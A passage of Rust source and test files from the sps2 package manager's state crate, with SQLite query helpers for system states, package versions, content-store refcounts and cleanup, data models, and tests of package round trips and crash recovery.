SELECT id, parent_id, created_at, operation, success, rollback_of, pruned_at
FROM states
ORDER BY created_at DESC
"#,
)
.fetch_all(&mut **tx)
.await?;
Ok(rows
.into_iter()
.map(|row| State {
id: row.get("id"),
parent_id: row.get("parent_id"),
created_at: row.get("created_at"),
operation: row.get("operation"),
success: row.get("success"),
rollback_of: row.get("rollback_of"),
pruned_at: row.get("pruned_at"),
})
.collect())
}
/// States eligible for cleanup by age and retention count
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_states_for_cleanup(
tx: &mut Transaction<'_, Sqlite>,
keep_count: usize,
cutoff_time: i64,
) -> Result<Vec<String>, Error> {
let rows = query(
r#"
SELECT id FROM states
WHERE id NOT IN (
SELECT id FROM states ORDER BY created_at DESC LIMIT ?1
)
AND created_at < ?2
AND id NOT IN (SELECT state_id FROM active_state WHERE id = 1)
AND success = 1
ORDER BY created_at ASC
"#,
)
.bind(i64::try_from(keep_count).map_err(|e| Error::internal(e.to_string()))?)
.bind(cutoff_time)
.fetch_all(&mut **tx)
.await?;
Ok(rows.into_iter().map(|r| r.get("id")).collect())
}
/// Delete a state row
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn delete_state(tx: &mut Transaction<'_, Sqlite>, state_id: &str) -> Result<(), Error> {
query("DELETE FROM states WHERE id = ?1")
.bind(state_id)
.execute(&mut **tx)
.await?;
Ok(())
}
/// Alias for `get_states_for_cleanup`
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_states_to_cleanup(
tx: &mut Transaction<'_, Sqlite>,
keep_count: usize,
cutoff_time: i64,
) -> Result<Vec<String>, Error> {
get_states_for_cleanup(tx, keep_count, cutoff_time).await
}
/// Strict retention: keep only N newest states
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_states_for_cleanup_strict(
tx: &mut Transaction<'_, Sqlite>,
keep_count: usize,
) -> Result<Vec<String>, Error> {
let rows = query(
r#"
SELECT id FROM states
WHERE id NOT IN (
SELECT id FROM states ORDER BY created_at DESC LIMIT ?1
)
AND id NOT IN (SELECT state_id FROM active_state WHERE id = 1)
AND success = 1
ORDER BY created_at ASC
"#,
)
.bind(i64::try_from(keep_count).map_err(|e| Error::internal(e.to_string()))?)
.fetch_all(&mut **tx)
.await?;
Ok(rows.into_iter().map(|r| r.get("id")).collect())
}
/// Alias for `get_unreferenced_items` (kept for callers)
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_unreferenced_store_items(
tx: &mut Transaction<'_, Sqlite>,
) -> Result<Vec<StoreRef>, Error> {
get_unreferenced_items(tx).await
}
/// Delete archive CAS rows for given hashes
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn delete_unreferenced_store_items(
tx: &mut Transaction<'_, Sqlite>,
hashes: &[String],
) -> Result<(), Error> {
for hash in hashes {
query("DELETE FROM cas_objects WHERE hash = ?1 AND kind = 'archive'")
.bind(hash)
.execute(&mut **tx)
.await?;
}
Ok(())
}
/// Fetch all archive CAS rows
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_all_store_refs(tx: &mut Transaction<'_, Sqlite>) -> Result<Vec<StoreRef>, Error> {
let rows = query(
r#"SELECT hash, ref_count, size_bytes AS size, created_at FROM cas_objects WHERE kind = 'archive'"#,
)
.fetch_all(&mut **tx)
.await?;
Ok(rows
.into_iter()
.map(|row| StoreRef {
hash: row.get("hash"),
ref_count: row.get("ref_count"),
size: row.get("size"),
created_at: row.get("created_at"),
})
.collect())
}
/// Map archive hash -> last reference timestamp
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_last_ref_map(
tx: &mut Transaction<'_, Sqlite>,
) -> Result<HashMap<String, i64>, Error> {
let rows = query(
r#"
SELECT pv.store_hash AS hash, COALESCE(MAX(s.created_at), 0) AS last_ref
FROM state_packages sp
JOIN package_versions pv ON pv.id = sp.package_version_id
JOIN states s ON s.id = sp.state_id
GROUP BY pv.store_hash
"#,
)
.fetch_all(&mut **tx)
.await?;
let mut map = HashMap::new();
for row in rows {
map.insert(row.get("hash"), row.get("last_ref"));
}
Ok(map)
}
/// Insert archive eviction log entry
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn insert_package_eviction(
tx: &mut Transaction<'_, Sqlite>,
hash: &str,
size: i64,
reason: Option<&str>,
) -> Result<(), Error> {
let now = chrono::Utc::now().timestamp();
query(
r#"
INSERT OR REPLACE INTO cas_evictions (hash, kind, evicted_at, size_bytes, reason)
VALUES (?1, 'archive', ?2, ?3, ?4)
"#,
)
.bind(hash)
.bind(now)
.bind(size)
.bind(reason)
.execute(&mut **tx)
.await?;
Ok(())
}
/// Insert file eviction log entry
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn insert_file_object_eviction(
tx: &mut Transaction<'_, Sqlite>,
hash: &str,
size: i64,
reason: Option<&str>,
) -> Result<(), Error> {
let now = chrono::Utc::now().timestamp();
query(
r#"
INSERT OR REPLACE INTO cas_evictions (hash, kind, evicted_at, size_bytes, reason)
VALUES (?1, 'file', ?2, ?3, ?4)
"#,
)
.bind(hash)
.bind(now)
.bind(size)
.bind(reason)
.execute(&mut **tx)
.await?;
Ok(())
}
/// List package names that depend on the given package name across all versions
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_dependents(
tx: &mut Transaction<'_, Sqlite>,
package_name: &str,
) -> Result<Vec<String>, Error> {
let rows = query(
r#"
SELECT DISTINCT pv.name
FROM package_versions pv
JOIN package_deps d ON d.package_version_id = pv.id
WHERE d.dep_name = ?1
ORDER BY pv.name
"#,
)
.bind(package_name)
.fetch_all(&mut **tx)
.await?;
Ok(rows.into_iter().map(|r| r.get("name")).collect())
}
/// Detailed state list (alias for `get_all_states`)
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn list_states_detailed(tx: &mut Transaction<'_, Sqlite>) -> Result<Vec<State>, Error> {
get_all_states(tx).await
}
/// States older than cutoff timestamp
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_states_older_than(
tx: &mut Transaction<'_, Sqlite>,
cutoff: i64,
) -> Result<Vec<String>, Error> {
let rows = query("SELECT id FROM states WHERE created_at < ? ORDER BY created_at ASC")
.bind(cutoff)
.fetch_all(&mut **tx)
.await?;
Ok(rows.into_iter().map(|r| r.get("id")).collect())
}
/// Mark states as pruned (except the active one)
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn mark_pruned_states(
tx: &mut Transaction<'_, Sqlite>,
ids: &[String],
ts: i64,
active_id: &str,
) -> Result<usize, Error> {
let mut updated = 0usize;
for id in ids {
if id == active_id {
continue;
}
let res = query("UPDATE states SET pruned_at = ?1 WHERE id = ?2 AND pruned_at IS NULL")
.bind(ts)
.bind(id)
.execute(&mut **tx)
.await?;
if res.rows_affected() > 0 {
updated += 1;
}
}
Ok(updated)
}
/// Clear pruned marker for a state
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn unprune_state(tx: &mut Transaction<'_, Sqlite>, id: &str) -> Result<(), Error> {
query("UPDATE states SET pruned_at = NULL WHERE id = ?1")
.bind(id)
.execute(&mut **tx)
.await?;
Ok(())
}
/// Fetch parent state ID if any
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_parent_state_id(
tx: &mut Transaction<'_, Sqlite>,
state_id: &StateId,
) -> Result<Option<StateId>, Error> {
let id_str = state_id.to_string();
let row = query("SELECT parent_id FROM states WHERE id = ?1")
.bind(id_str)
.fetch_optional(&mut **tx)
.await?;
match row {
Some(r) => {
let parent: Option<String> = r.get("parent_id");
if let Some(p) = parent {
let id = uuid::Uuid::parse_str(&p)
.map_err(|e| Error::internal(format!("invalid parent state ID: {e}")))?;
Ok(Some(id))
} else {
Ok(None)
}
}
None => Ok(None),
}
}
/// Legacy helper: record package files for directory entries (no-op for new schema)
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn add_package_file(
tx: &mut Transaction<'_, Sqlite>,
_state_id: &StateId,
package_name: &str,
package_version: &str,
file_path: &str,
is_directory: bool,
) -> Result<(), Error> {
let mode = if is_directory { 0 } else { 0o644 };
query(
r#"
INSERT OR IGNORE INTO package_files
(package_version_id, file_hash, rel_path, mode, uid, gid, mtime)
VALUES (
(SELECT id FROM package_versions WHERE name = ?1 AND version = ?2),
'', ?3, ?4, 0, 0, NULL
)
"#,
)
.bind(package_name)
.bind(package_version)
.bind(file_path)
.bind(i64::from(mode))
.execute(&mut **tx)
.await?;
Ok(())
}
/// Fetch package file paths for a given version
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_files(
tx: &mut Transaction<'_, Sqlite>,
_state_id: &StateId,
package_name: &str,
package_version: &str,
) -> Result<Vec<String>, Error> {
let rows = query(
r#"
SELECT pf.rel_path
FROM package_files pf
JOIN package_versions pv ON pv.id = pf.package_version_id
WHERE pv.name = ?1 AND pv.version = ?2
ORDER BY pf.rel_path
"#,
)
.bind(package_name)
.bind(package_version)
.fetch_all(&mut **tx)
.await?;
Ok(rows.into_iter().map(|r| r.get("rel_path")).collect())
}
/// Fetch package files ensuring version is present in state
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_files_with_inheritance(
tx: &mut Transaction<'_, Sqlite>,
state_id: &StateId,
package_name: &str,
package_version: &str,
) -> Result<Vec<String>, Error> {
let id_str = state_id.to_string();
let exists = query(
r#"
SELECT 1
FROM state_packages sp
JOIN package_versions pv ON pv.id = sp.package_version_id
WHERE sp.state_id = ?1 AND pv.name = ?2 AND pv.version = ?3
LIMIT 1
"#,
)
.bind(id_str)
.bind(package_name)
.bind(package_version)
.fetch_optional(&mut **tx)
.await?
.is_some();
if !exists {
return Ok(Vec::new());
}
get_package_files(tx, state_id, package_name, package_version).await
}
/// Package files for the active state
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_active_package_files(
tx: &mut Transaction<'_, Sqlite>,
package_name: &str,
package_version: &str,
) -> Result<Vec<String>, Error> {
let active = get_active_state(tx).await?;
get_package_files(tx, &active, package_name, package_version).await
}
/// Remove package files for a given version
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn remove_package_files(
tx: &mut Transaction<'_, Sqlite>,
_state_id: &StateId,
package_name: &str,
package_version: &str,
) -> Result<(), Error> {
query(
r#"
DELETE FROM package_files
WHERE package_version_id = (SELECT id FROM package_versions WHERE name = ?1 AND version = ?2)
"#,
)
.bind(package_name)
.bind(package_version)
.execute(&mut **tx)
.await?;
Ok(())
}
/// Insert GC run entry
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn insert_gc_log(
tx: &mut Transaction<'_, Sqlite>,
items_removed: i64,
space_freed: i64,
) -> Result<(), Error> {
let now = chrono::Utc::now().timestamp();
query(
r#"
INSERT INTO gc_runs (run_at, scope, items_removed, bytes_freed, notes)
VALUES (?1, 'both', ?2, ?3, NULL)
"#,
)
.bind(now)
.bind(items_removed)
.bind(space_freed)
.execute(&mut **tx)
.await?;
Ok(())
}
/// Add package with venv path (venv ignored in v2 schema)
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn add_package_with_venv(
tx: &mut Transaction<'_, Sqlite>,
state_id: &StateId,
name: &str,
version: &str,
store_hash: &str,
size: i64,
_venv_path: Option<&str>,
) -> Result<i64, Error> {
add_package(tx, state_id, name, version, store_hash, size).await
}
/// Venv path lookup (always None now)
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_venv_path(
_tx: &mut Transaction<'_, Sqlite>,
_state_id: &StateId,
_package_name: &str,
_package_version: &str,
) -> Result<Option<String>, Error> {
Ok(None)
}
/// Packages with venvs (empty under v2 schema)
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_packages_with_venvs(
_tx: &mut Transaction<'_, Sqlite>,
_state_id: &StateId,
) -> Result<Vec<(String, String, String)>, Error> {
Ok(Vec::new())
}
/// Update venv path (no-op)
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn update_package_venv_path(
_tx: &mut Transaction<'_, Sqlite>,
_state_id: &StateId,
_package_name: &str,
_package_version: &str,
_venv_path: Option<&str>,
) -> Result<(), Error> {
Ok(())
}
/// Record package mapping (now writes to `package_versions`)
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn add_package_map(
tx: &mut Transaction<'_, Sqlite>,
name: &str,
version: &str,
store_hash: &str,
package_hash: Option<&str>,
) -> Result<(), Error> {
let now = chrono::Utc::now().timestamp();
query(
r#"
INSERT INTO package_versions (name, version, store_hash, package_hash, size_bytes, created_at)
VALUES (?1, ?2, ?3, ?4, 0, ?5)
ON CONFLICT(name, version) DO UPDATE SET
store_hash = excluded.store_hash,
package_hash = excluded.package_hash
"#,
)
.bind(name)
.bind(version)
.bind(store_hash)
.bind(package_hash)
.bind(now)
.execute(&mut **tx)
.await?;
Ok(())
}
/// Lookup store hash by name+version
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_hash(
tx: &mut Transaction<'_, Sqlite>,
name: &str,
version: &str,
) -> Result<Option<String>, Error> {
let row = query("SELECT store_hash FROM package_versions WHERE name = ?1 AND version = ?2")
.bind(name)
.bind(version)
.fetch_optional(&mut **tx)
.await?;
Ok(row.map(|r| r.get("store_hash")))
}
/// Lookup store hash by package archive hash
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_store_hash_for_package_hash(
tx: &mut Transaction<'_, Sqlite>,
package_hash: &str,
) -> Result<Option<String>, Error> {
let row = query("SELECT store_hash FROM package_versions WHERE package_hash = ?1")
.bind(package_hash)
.fetch_optional(&mut **tx)
.await?;
Ok(row.map(|r| r.get("store_hash")))
}
/// Remove package mapping entry
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn remove_package_map(
tx: &mut Transaction<'_, Sqlite>,
name: &str,
version: &str,
) -> Result<(), Error> {
query("DELETE FROM package_versions WHERE name = ?1 AND version = ?2")
.bind(name)
.bind(version)
.execute(&mut **tx)
.await?;
Ok(())
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/models.rs | crates/state/src/models.rs | //! Database models for state management
use chrono::{DateTime, Utc};
use serde::{Deserialize, Serialize};
use sps2_hash::Hash;
use sps2_types::{StateId, Version};
use sqlx::FromRow;
/// A system state record
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct State {
pub id: String,
pub parent_id: Option<String>,
pub created_at: i64,
pub operation: String,
pub success: bool,
pub rollback_of: Option<String>,
pub pruned_at: Option<i64>,
}
impl State {
/// Convert to `StateId`
///
/// # Panics
///
/// Panics if the stored ID is not a valid UUID.
#[must_use]
pub fn state_id(&self) -> StateId {
uuid::Uuid::parse_str(&self.id).expect("valid UUID in database")
}
/// Get creation timestamp
///
/// # Panics
///
/// Panics if the stored timestamp is not valid.
#[must_use]
pub fn timestamp(&self) -> DateTime<Utc> {
DateTime::from_timestamp(self.created_at, 0).expect("valid timestamp in database")
}
}
/// An installed package record
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct Package {
pub id: i64,
pub state_id: String,
pub name: String,
pub version: String,
pub hash: String,
pub size: i64,
pub installed_at: i64,
pub venv_path: Option<String>,
}
impl Package {
/// Parse the version
///
/// # Panics
///
/// Panics if the stored version string is not valid.
#[must_use]
pub fn version(&self) -> Version {
Version::parse(&self.version).expect("valid version in database")
}
/// Parse the hash
///
/// # Panics
///
/// Panics if the stored hash string is not valid.
#[must_use]
pub fn hash(&self) -> Hash {
Hash::from_hex(&self.hash).expect("valid hash in database")
}
}
/// A package dependency record
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct Dependency {
pub id: i64,
pub package_id: i64,
pub dep_name: String,
pub dep_spec: String,
pub dep_kind: String,
}
/// A store reference count record
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct StoreRef {
pub hash: String,
pub ref_count: i64,
pub size: i64,
pub created_at: i64,
}
impl StoreRef {
/// Parse the hash
///
/// # Panics
///
/// Panics if the stored hash string is not valid.
#[must_use]
pub fn hash(&self) -> Hash {
Hash::from_hex(&self.hash).expect("valid hash in database")
}
}
/// Package reference for state transitions
#[derive(Debug, Clone)]
pub struct PackageRef {
pub state_id: uuid::Uuid,
pub package_id: sps2_resolver::PackageId,
pub hash: String,
pub size: i64,
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/db/mod.rs | crates/state/src/db/mod.rs | pub mod refcount_deltas;
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/db/refcount_deltas.rs | crates/state/src/db/refcount_deltas.rs | use sps2_errors::{Error, StateError};
use sps2_types::StateId;
use sqlx::{query, Sqlite, Transaction};
/// Ensure CAS rows exist for archives referenced by the target state.
///
/// # Errors
///
/// Returns an error if the database operation fails.
async fn ensure_archive_cas_rows(
tx: &mut Transaction<'_, Sqlite>,
to_state: &StateId,
) -> Result<(), Error> {
let to_str = to_state.to_string();
query(
r#"
INSERT OR IGNORE INTO cas_objects (hash, kind, size_bytes, created_at, ref_count)
SELECT DISTINCT pv.store_hash, 'archive', pv.size_bytes, strftime('%s','now'), 0
FROM state_packages sp
JOIN package_versions pv ON pv.id = sp.package_version_id
WHERE sp.state_id = ?1 AND pv.store_hash IS NOT NULL
"#,
)
.bind(&to_str)
.execute(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("ensure archive cas rows failed: {e}"),
})?;
Ok(())
}
/// Calculate archive refcount increases for new hashes.
///
/// # Errors
///
/// Returns an error if the database operation fails.
async fn calculate_archive_increases(
tx: &mut Transaction<'_, Sqlite>,
from_state: Option<&StateId>,
to_state: &StateId,
) -> Result<u64, Error> {
let to_str = to_state.to_string();
Ok(if let Some(from) = from_state {
let from_str = from.to_string();
query(
r#"
WITH
to_hashes AS (
SELECT DISTINCT pv.store_hash AS hash
FROM state_packages sp
JOIN package_versions pv ON pv.id = sp.package_version_id
WHERE sp.state_id = ?1
),
from_hashes AS (
SELECT DISTINCT pv.store_hash AS hash
FROM state_packages sp
JOIN package_versions pv ON pv.id = sp.package_version_id
WHERE sp.state_id = ?2
),
new_hashes AS (
SELECT hash FROM to_hashes
EXCEPT
SELECT hash FROM from_hashes
)
UPDATE cas_objects
SET ref_count = ref_count + 1
WHERE kind = 'archive' AND hash IN (SELECT hash FROM new_hashes)
"#,
)
.bind(&to_str)
.bind(&from_str)
.execute(&mut **tx)
.await?
.rows_affected()
} else {
query(
r#"
UPDATE cas_objects
SET ref_count = ref_count + 1
WHERE kind = 'archive' AND hash IN (
SELECT DISTINCT pv.store_hash
FROM state_packages sp
JOIN package_versions pv ON pv.id = sp.package_version_id
WHERE sp.state_id = ?1
)
"#,
)
.bind(&to_str)
.execute(&mut **tx)
.await?
.rows_affected()
})
}
/// Calculate archive refcount decreases for removed hashes.
///
/// # Errors
///
/// Returns an error if the database operation fails.
async fn calculate_archive_decreases(
tx: &mut Transaction<'_, Sqlite>,
from_state: Option<&StateId>,
to_state: &StateId,
) -> Result<u64, Error> {
let to_str = to_state.to_string();
Ok(if let Some(from) = from_state {
let from_str = from.to_string();
query(
r#"
WITH
to_hashes AS (
SELECT DISTINCT pv.store_hash AS hash
FROM state_packages sp
JOIN package_versions pv ON pv.id = sp.package_version_id
WHERE sp.state_id = ?1
),
from_hashes AS (
SELECT DISTINCT pv.store_hash AS hash
FROM state_packages sp
JOIN package_versions pv ON pv.id = sp.package_version_id
WHERE sp.state_id = ?2
),
removed_hashes AS (
SELECT hash FROM from_hashes
EXCEPT
SELECT hash FROM to_hashes
)
UPDATE cas_objects
SET ref_count = ref_count - 1
WHERE kind = 'archive' AND hash IN (SELECT hash FROM removed_hashes)
"#,
)
.bind(&to_str)
.bind(&from_str)
.execute(&mut **tx)
.await?
.rows_affected()
} else {
0
})
}
/// Apply archive refcount deltas when transitioning from `from_state` -> `to_state`.
///
/// # Errors
///
/// Returns an error if the database operations fail.
pub async fn apply_archive_refcount_deltas(
tx: &mut Transaction<'_, Sqlite>,
from_state: Option<&StateId>,
to_state: &StateId,
) -> Result<(u64, u64), Error> {
// Ensure CAS rows exist for archives referenced by the target state.
ensure_archive_cas_rows(tx, to_state).await?;
let inc_rows = calculate_archive_increases(tx, from_state, to_state).await?;
let dec_rows = calculate_archive_decreases(tx, from_state, to_state).await?;
Ok((inc_rows, dec_rows))
}
/// Ensure verification rows exist for file hashes.
///
/// # Errors
///
/// This function does not return errors as it uses `.ok()` to ignore them.
async fn ensure_file_verification_rows(tx: &mut Transaction<'_, Sqlite>, to_state: &StateId) {
let to_str = to_state.to_string();
query(
r#"
INSERT OR IGNORE INTO file_verification (file_hash, status, attempts, last_checked_at, last_error)
SELECT DISTINCT pf.file_hash, 'pending', 0, NULL, NULL
FROM state_packages sp
JOIN package_files pf ON pf.package_version_id = sp.package_version_id
WHERE sp.state_id = ?1
"#,
)
.bind(&to_str)
.execute(&mut **tx)
.await
.ok();
}
/// Calculate file refcount increases for new hashes.
///
/// # Errors
///
/// Returns an error if the database operation fails.
async fn calculate_file_increases(
tx: &mut Transaction<'_, Sqlite>,
from_state: Option<&StateId>,
to_state: &StateId,
) -> Result<u64, Error> {
let to_str = to_state.to_string();
Ok(if let Some(from) = from_state {
let from_str = from.to_string();
query(
r#"
WITH
to_hashes AS (
SELECT DISTINCT pf.file_hash AS hash
FROM state_packages sp
JOIN package_files pf ON pf.package_version_id = sp.package_version_id
WHERE sp.state_id = ?1
),
from_hashes AS (
SELECT DISTINCT pf.file_hash AS hash
FROM state_packages sp
JOIN package_files pf ON pf.package_version_id = sp.package_version_id
WHERE sp.state_id = ?2
),
new_hashes AS (
SELECT hash FROM to_hashes
EXCEPT
SELECT hash FROM from_hashes
)
UPDATE cas_objects
SET ref_count = ref_count + 1,
last_seen_at = strftime('%s','now')
WHERE kind = 'file' AND hash IN (SELECT hash FROM new_hashes)
"#,
)
.bind(&to_str)
.bind(&from_str)
.execute(&mut **tx)
.await?
.rows_affected()
} else {
query(
r#"
UPDATE cas_objects
SET ref_count = ref_count + 1,
last_seen_at = strftime('%s','now')
WHERE kind = 'file' AND hash IN (
SELECT DISTINCT pf.file_hash
FROM state_packages sp
JOIN package_files pf ON pf.package_version_id = sp.package_version_id
WHERE sp.state_id = ?1
)
"#,
)
.bind(&to_str)
.execute(&mut **tx)
.await?
.rows_affected()
})
}
/// Calculate file refcount decreases for removed hashes.
///
/// # Errors
///
/// Returns an error if the database operation fails.
async fn calculate_file_decreases(
tx: &mut Transaction<'_, Sqlite>,
from_state: Option<&StateId>,
to_state: &StateId,
) -> Result<u64, Error> {
let to_str = to_state.to_string();
Ok(if let Some(from) = from_state {
let from_str = from.to_string();
query(
r#"
WITH
to_hashes AS (
SELECT DISTINCT pf.file_hash AS hash
FROM state_packages sp
JOIN package_files pf ON pf.package_version_id = sp.package_version_id
WHERE sp.state_id = ?1
),
from_hashes AS (
SELECT DISTINCT pf.file_hash AS hash
FROM state_packages sp
JOIN package_files pf ON pf.package_version_id = sp.package_version_id
WHERE sp.state_id = ?2
),
removed_hashes AS (
SELECT hash FROM from_hashes
EXCEPT
SELECT hash FROM to_hashes
)
UPDATE cas_objects
SET ref_count = ref_count - 1
WHERE kind = 'file' AND hash IN (SELECT hash FROM removed_hashes)
"#,
)
.bind(&to_str)
.bind(&from_str)
.execute(&mut **tx)
.await?
.rows_affected()
} else {
0
})
}
/// Apply file-object refcount deltas when transitioning from `from_state` -> `to_state`.
///
/// # Errors
///
/// Returns an error if the database operations fail.
pub async fn apply_file_refcount_deltas(
tx: &mut Transaction<'_, Sqlite>,
from_state: Option<&StateId>,
to_state: &StateId,
) -> Result<(u64, u64), Error> {
let inc_rows = calculate_file_increases(tx, from_state, to_state).await?;
ensure_file_verification_rows(tx, to_state).await;
let dec_rows = calculate_file_decreases(tx, from_state, to_state).await?;
Ok((inc_rows, dec_rows))
}
/// Apply both archive and file refcount deltas.
///
/// # Errors
///
/// Returns an error if either the archive or file refcount operations fail.
pub async fn apply_all_refcount_deltas(
tx: &mut Transaction<'_, Sqlite>,
from_state: Option<&StateId>,
to_state: &StateId,
) -> Result<((u64, u64), (u64, u64)), Error> {
let arch = apply_archive_refcount_deltas(tx, from_state, to_state).await?;
let files = apply_file_refcount_deltas(tx, from_state, to_state).await?;
Ok((arch, files))
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/tests/queries_runtime_v2.rs | crates/state/tests/queries_runtime_v2.rs | use sps2_hash::Hash;
use tempfile::TempDir;
#[tokio::test]
async fn add_and_fetch_package_round_trip() {
let temp_dir = TempDir::new().expect("tempdir");
let db_path = temp_dir.path().join("state.sqlite");
let pool = sps2_state::create_pool(&db_path)
.await
.expect("create pool");
sps2_state::run_migrations(&pool)
.await
.expect("run migrations");
let state_id = uuid::Uuid::new_v4();
let mut tx = pool.begin().await.expect("begin tx");
sps2_state::queries::create_state(&mut tx, &state_id, None, "install")
.await
.expect("create state");
sps2_state::queries::set_active_state(&mut tx, &state_id)
.await
.expect("set active state");
let pkg_row =
sps2_state::queries::add_package(&mut tx, &state_id, "hello", "1.0.0", "store-hash", 42)
.await
.expect("add package");
tx.commit().await.expect("commit");
let mut tx = pool.begin().await.expect("begin tx2");
let packages = sps2_state::queries::get_state_packages(&mut tx, &state_id)
.await
.expect("get packages");
assert_eq!(packages.len(), 1);
let pkg = &packages[0];
assert_eq!(pkg.id, pkg_row);
assert_eq!(pkg.name, "hello");
assert_eq!(pkg.version, "1.0.0");
assert_eq!(pkg.hash, "store-hash");
assert_eq!(pkg.size, 42);
}
#[tokio::test]
async fn add_file_object_and_entry_round_trip() {
use sps2_state::file_queries_runtime as files;
use sps2_state::queries;
let temp_dir = TempDir::new().expect("tempdir");
let db_path = temp_dir.path().join("state.sqlite");
let pool = sps2_state::create_pool(&db_path)
.await
.expect("create pool");
sps2_state::run_migrations(&pool)
.await
.expect("run migrations");
let state_id = uuid::Uuid::new_v4();
let mut tx = pool.begin().await.expect("begin tx");
queries::create_state(&mut tx, &state_id, None, "install")
.await
.expect("create state");
queries::set_active_state(&mut tx, &state_id)
.await
.expect("set active state");
let pkg_row = queries::add_package(&mut tx, &state_id, "pkg", "1.0.0", "store-hash", 10)
.await
.expect("add package");
let file_hash = Hash::from_data(b"hello-file");
let metadata = sps2_state::file_models::FileMetadata {
size: 5,
permissions: 0o755,
uid: 0,
gid: 0,
mtime: None,
is_executable: true,
is_symlink: false,
symlink_target: None,
};
files::add_file_object(&mut tx, &file_hash, &metadata)
.await
.expect("add file object");
let file_ref = sps2_state::file_models::FileReference {
package_id: pkg_row,
relative_path: "bin/hello".to_string(),
hash: file_hash.clone(),
metadata: metadata.clone(),
};
files::add_package_file_entry(&mut tx, pkg_row, &file_ref)
.await
.expect("add file entry");
tx.commit().await.expect("commit");
let mut tx = pool.begin().await.expect("begin tx2");
let entries = files::get_package_file_entries(&mut tx, pkg_row)
.await
.expect("get file entries");
assert_eq!(entries.len(), 1);
let entry = &entries[0];
assert_eq!(entry.relative_path, "bin/hello");
assert_eq!(entry.file_hash, file_hash.to_hex());
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/tests/recovery.rs | crates/state/tests/recovery.rs | //! tests/recovery.rs
use sps2_state::PackageRef;
use sps2_state::StateManager;
use sps2_state::TransactionData;
use sps2_types::Version;
use tempfile::TempDir;
use uuid::Uuid;
async fn mk_state() -> (TempDir, StateManager) {
let td = TempDir::new().expect("tempdir");
let mgr = StateManager::new(td.path()).await.expect("state new");
(td, mgr)
}
#[tokio::test]
async fn test_recovers_from_prepared_state() {
let (_td, state) = mk_state().await;
let parent_id = state.get_current_state_id().await.unwrap();
// 1. Prepare a transaction, which writes the journal in the `Prepared` state.
let staging_id = Uuid::new_v4();
let pkg_hash = sps2_hash::Hash::from_data(b"prepared-pkg").to_hex();
let pid = sps2_resolver::PackageId::new("A".to_string(), Version::parse("1.0.0").unwrap());
let pref = PackageRef {
state_id: staging_id,
package_id: pid.clone(),
hash: pkg_hash.clone(),
size: 1,
};
let td = TransactionData {
package_refs: &[pref],
file_references: &[],
pending_file_hashes: &[],
};
let staging_slot = state.inactive_slot().await;
let journal = state
.prepare_transaction(&staging_id, &parent_id, staging_slot, "install", &td)
.await
.unwrap();
// At this point, a crash happens. The journal file exists.
// The live directory should still point to the parent state.
let live_path = state.live_path().to_path_buf();
assert!(
!live_path.join("A-1.0.0").exists(),
"Live dir should not be updated yet"
);
// 2. Simulate an application restart by creating a new StateManager.
// The new manager should automatically run recovery.
let state_base_path = _td.path().to_path_buf();
let new_state_manager = StateManager::new(&state_base_path).await.unwrap();
// 3. Verify the outcome.
// The new state should be active.
let active_id = new_state_manager.get_current_state_id().await.unwrap();
assert_eq!(active_id, staging_id);
// The journal file should be gone.
let journal_path = state_base_path.join("transaction.json");
assert!(
tokio::fs::metadata(&journal_path).await.is_err(),
